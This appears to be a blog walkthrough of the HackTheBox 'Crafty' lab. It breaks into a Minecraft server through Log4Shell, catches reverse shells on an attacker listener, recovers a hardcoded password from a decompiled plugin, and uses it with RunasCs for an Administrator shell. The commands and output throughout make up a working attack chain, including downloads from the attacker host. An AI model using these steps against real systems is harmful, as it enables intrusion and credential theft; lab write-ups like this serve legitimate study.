Exploit Minecraft Server | HackTheBox Crafty Walkthrough

In this post, we covered the solution of HackTheBox Crafty machine where we showcased the exploitation of a vulnerable Minecraft server to Log4j vulnerability using a Log4Shell payload.

Information Gathering and Enumeration

We start with an Nmap scan as shown below

 nmap -p- --min-rate 10000 10.10.11.249
Starting Nmap 7.80 ( https://nmap.org ) at 2024-06-10 15:30 EDT
Nmap scan report for 10.10.11.249
Host is up (0.11s latency).
Not shown: 65533 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
25565/tcp open  minecraft

Nmap done: 1 IP address (1 host up) scanned in 13.58 seconds




nmap -p 80,25565 -sCV 10.10.11.249
Starting Nmap 7.80 ( https://nmap.org ) at 2024-06-10 15:30 EDT
Nmap scan report for 10.10.11.249
Host is up (0.11s latency).

PORT      STATE SERVICE   VERSION
80/tcp    open  http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://crafty.htb
25565/tcp open  minecraft Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 0/100)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.95 seconds

Windows Active Directory Penetration Testing Study Notes

OSCP Study Notes

Minecraft Server Exploitation

Based on the nmap scan results, the Minecraft server is running on port 25565 which means we can connect to it using nc.

echo -ne "\xfe\x01" | nc crafty.htb 25565

One of the most dangerous flaws found to date is Log4Shell. There is a flaw in the popular Java logging package Log4J that allows remote code execution. One popular service that was susceptible to Log4Shell was Minecraft.

The effects of Log4Shell on Minecraft are discussed here. In particular, the starting command line needs to be changed for versions 1.12–1.16.5 in order to patch it or upgrade to 1.17.

Start by downloading the Minecraft console client from here because you will need it to interact with the server and send the Log4J payload.

As shown below, we connect to the server using kali as a username and supply blank password along with the IP address of the crafty machine.

./MinecraftClient-20240415-263-linux-x64 kali

Minecraft Console Client v1.20.4 - for MC 1.4.6 to 1.20.4 - Github.com/MCCTeam
GitHub build 263, built on 2024-04-15 from commit 403284c
Password(invisible): 
You chose to run in offline mode.
Server IP : 
Resolving crafty.htb...
Retrieving Server Info...
Server version : 1.16.5 (protocol v754)
[MCC] Version is supported.
Logging in...
[MCC] Server is in offline mode.
[MCC] Server was successfully joined.
Type '/quit' to leave the server.
> 

Next step is to fire up a listener on your attacking machine

nc -lnvp 445
Listening on 0.0.0.0 445
Connection received on 10.10.11.249 49682

Next is to download the POC , and install the requirements.

attacker@attacker$ git clone https://github.com/kozmer/log4j-shell-poc.git
attacker@attacker$ cd log4j-shell-poc/ 
attacker@attacker$ pip install -r requirements.txt

Before we start the exploit, we must first download the relevant Java binary from here and make sure to place it under the same directory of the POC exploit and rename it to jdk1.8.0_20

Next is to open the exploit POC python file, locate the line that says String cmd="/bin/sh";, and change it to String cmd="cmd.exe"; because the target OS here is Windows and /bin/sh won’t work on Windows.

And lastly, run the exploit:

python poc.py –userip 10.10.14.6 –webport 8000 –lport 445

Now jump back to the Minecraft console client and execute the given payload by the POC.

And this will return a shell to your previously-run listener.

c:\Users\svc_minecraft\Desktop> powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\svc_minecraft\Desktop> 

Windows Privilege Escalation and Post Exploitation

Below are the users found on the target system

PS C:\Users> ls

    Directory: C:\Users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/10/2020   8:17 AM                Administrator
d-r---       10/26/2023   7:03 PM                Public
d-----       11/21/2023  12:53 AM                svc_minecraft 

The Minecraft server which we exploited earleir is stored svc_minecraft directory as shown below:

PS C:\Users\svc_minecraft\server> ls

    Directory: C:\Users\svc_minecraft\server

Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----
d-----        6/10/2024  12:11 PM                logs
d-----       10/27/2023   2:48 PM                plugins
d-----        6/10/2024   2:44 PM                world
-a----       11/14/2023  10:00 PM              2 banned-ips.json
-a----       11/14/2023  10:00 PM              2 banned-players.json
-a----       10/24/2023   1:48 PM            183 eula.txt
-a----       11/14/2023  11:22 PM              2 ops.json
-a----       10/24/2023   1:43 PM       37962360 server.jar
-a----       11/14/2023  10:00 PM           1130 server.properties
-a----        6/10/2024   2:38 PM            111 usercache.json
-a----       10/24/2023   1:51 PM              2 whitelist.json

An interesting part of exploiting Minecraft server is looking through the plugins directory and analyzing the existing plugins.

I discoverd one plugin named playercounter-1.0-SNAPSHOT.jar which tempted me to analyze it locally on my attacker machine.

I followed the below steps to transfer it to my machine:

attacker@attacker$ smbserver.py share . -smb2support -username kali -password kali

On the target Windows machine:

PS C:\Users\svc_minecraft\server\plugins> net use \.10.14.6\share /u:kali kali
The command completed successfully.

PS C:\Users\svc_minecraft\server\plugins> copy playercounter-1.0-SNAPSHOT.jar \.10.14.6\share\

Java Reverse Engineering & Credential Harvesting

Since the plugin is written in Java, we will need a Java decompiler to analyze it. I used JD-GIU to accomplish this purpose.

After opening the plugin file with the Java decompiler, we can note down the below observations:

• The Playercounter.class file contains the main code logic of the plugins.
• plungin.yml houses the metdata.
• The main code is connecting to rkon on port 27015 with s67u84zKq8IXw as the password.

Credential Re-use

With the credentials discovered from the previous step, we can attempt to use it by transporting RunasCs to the target Windows machine as shown below:

PS C:\programdata> wget http://10.10.14.6/RunasCs.exe -outfile RunasCs.exe
PS C:\programdata> .\RunasCs.exe Administrator s67u84zKq8IXw "cmd /c whoami"

Knowing that with RunasCs we can specify an IP and Port to connect to, we can spawn a new listener on the attacker machine and connect to it.

PS C:\programdata> .\RunasCs.exe Administrator s67u84zKq8IXw cmd -r 10.10.14.6:443
[+] Running in session 1 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: WinSta0\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 3436 created in background.

On the attacker machine,

attacker@attacker$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.249 49721
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
crafty\administrator

And this should conclude the challenge.

HackTheBox CTF Walkthrough Playlist